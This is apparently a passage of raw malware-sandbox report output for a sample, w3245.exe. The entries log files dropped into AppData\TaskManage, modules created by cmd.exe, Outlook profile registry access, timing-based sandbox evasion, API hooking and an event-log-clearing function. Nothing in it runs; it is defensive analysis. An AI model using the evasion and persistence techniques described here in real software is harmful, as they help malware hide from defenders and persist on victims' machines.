Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
Source: bxigrg.4.drLNK file: ..\..\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: w3245.exeStatic file information: File size 15806278 > 1048576
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile opened: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcr100.dllJump to behavior
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: w3245.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3245.exe, 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000000.1694764523.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000000.1701554751.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1807193825.000000006B491000.00000020.00000001.01000000.00000015.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073421125.000000006BDB1000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1807089950.000000006B3D1000.00000020.00000001.01000000.00000016.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073697527.000000006BFB1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000002.00000002.1748082870.000000000A080000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1747896540.0000000009D22000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805704607.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805953912.000000000A82C000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805820438.000000000A470000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091445056.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2092120165.0000000005670000.00000004.00001000.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068385981.000000000A215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000002.00000002.1748082870.000000000A080000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1747896540.0000000009D22000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805704607.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805953912.000000000A82C000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805820438.000000000A470000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091445056.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2092120165.0000000005670000.00000004.00001000.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068385981.000000000A215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000002.00000002.1749820013.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000003.00000002.1807780117.000000006B8F1000.00000020.00000001.01000000.00000011.sdmp, RescueCDBurner.exe, 0000000A.00000002.2074506885.000000006F841000.00000020.00000001.01000000.00000011.sdmp
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: hsiywoxwiypiaj.4.drStatic PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: QtCore4.dll.1.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: QtCore4.dll.2.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: eykunyxpxybnsa.11.drStatic PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: Fondue.dll.1.drStatic PE information: real checksum: 0x34dc9 should be: 0x3baae
Source: StarBurn.dll.1.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.2.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: w3245.exeStatic PE information: section name: .wixburn
Source: w3245.exe.0.drStatic PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.4.drStatic PE information: section name: Shared
Source: hsiywoxwiypiaj.4.drStatic PE information: section name: .xdata
Source: hsiywoxwiypiaj.4.drStatic PE information: section name: gjwrx
Source: eykunyxpxybnsa.11.drStatic PE information: section name: .xdata
Source: eykunyxpxybnsa.11.drStatic PE information: section name: gjwrx
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092EAD6 push ecx; ret 0_2_0092EAE9
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB10CD push 00000005h; retf 1_2_00CB10CF
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAEAD6 push ecx; ret 1_2_00CAEAE9
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeCode function: 2_2_6BD312B5 push ecx; ret 2_2_6BD312C8
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeCode function: 2_2_6BC22020 push ecx; mov dword ptr [esp], 00000000h2_2_6BC22021
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B0C89C5 push ecx; ret 3_2_6B0C89D8
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3D2D88 push eax; ret 3_2_6B3D2DA6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E0CC5 push ecx; ret 3_2_6B3E0CD8
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3FA6AA push EF3FEFD4h; iretd 3_2_6B3FA6B1
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3F9CD8 pushad ; iretd 3_2_6B3F9CE6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3EB658 push ecx; ret 3_2_6B3EB66B
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4C3801 push ecx; ret 3_2_6B4C3814
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4C3D95 push ecx; ret 3_2_6B4C3DA8
Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.1.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.2.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\Fondue.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\hsiywoxwiypiajJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\eykunyxpxybnsaJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtCore4.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to dropped file
Source: C:\Users\user\Desktop\w3245.exeFile created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB43AA1 _StartService_@12,lstrlenW,GlobalAlloc,WideCharToMultiByte,StartServiceA,MultiByteToWideChar,GlobalFree,1_2_5BB43AA1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\HSIYWOXWIYPIAJ
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\EYKUNYXPXYBNSA
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3DE09 _ClearEventLog_@8,SetLastError,newMultiByteFromWideChar,ClearEventLogA,GlobalFree,1_2_5BB3DE09
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42A3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,3_2_6B42A3DD

Malware Analysis System Evasion

Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BA37C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BA37C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BA37945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6BA33B54
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: _EnumServicesStatus_@32,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,EnumServicesStatusA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,1_2_5BB42F59
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeDropped PE file which has not been started: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\Fondue.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hsiywoxwiypiajJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eykunyxpxybnsaJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeEvaded block: after key decision
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\Desktop\w3245.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeAPI coverage: 4.3 %
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe TID: 7364Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6092Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 7736Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0093FF61h0_2_0093FEC6
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0093FF5Ah0_2_0093FEC6
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CBFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00CBFF61h1_2_00CBFEC6
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CBFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00CBFF5Ah1_2_00CBFEC6
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00903CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00903CC4
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00944440 FindFirstFileW,FindClose,0_2_00944440
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00919B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00919B43
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CC4440 FindFirstFileW,FindClose,1_2_00CC4440
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C99B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00C99B43
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C83CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00C83CC4
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3D32E
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,1_2_5BB3D43A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6B42C8FD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B43088A _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B43088A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6B42CC23
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B430CBB _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B430CBB
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3F81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B3F81A1
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42E0BD _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_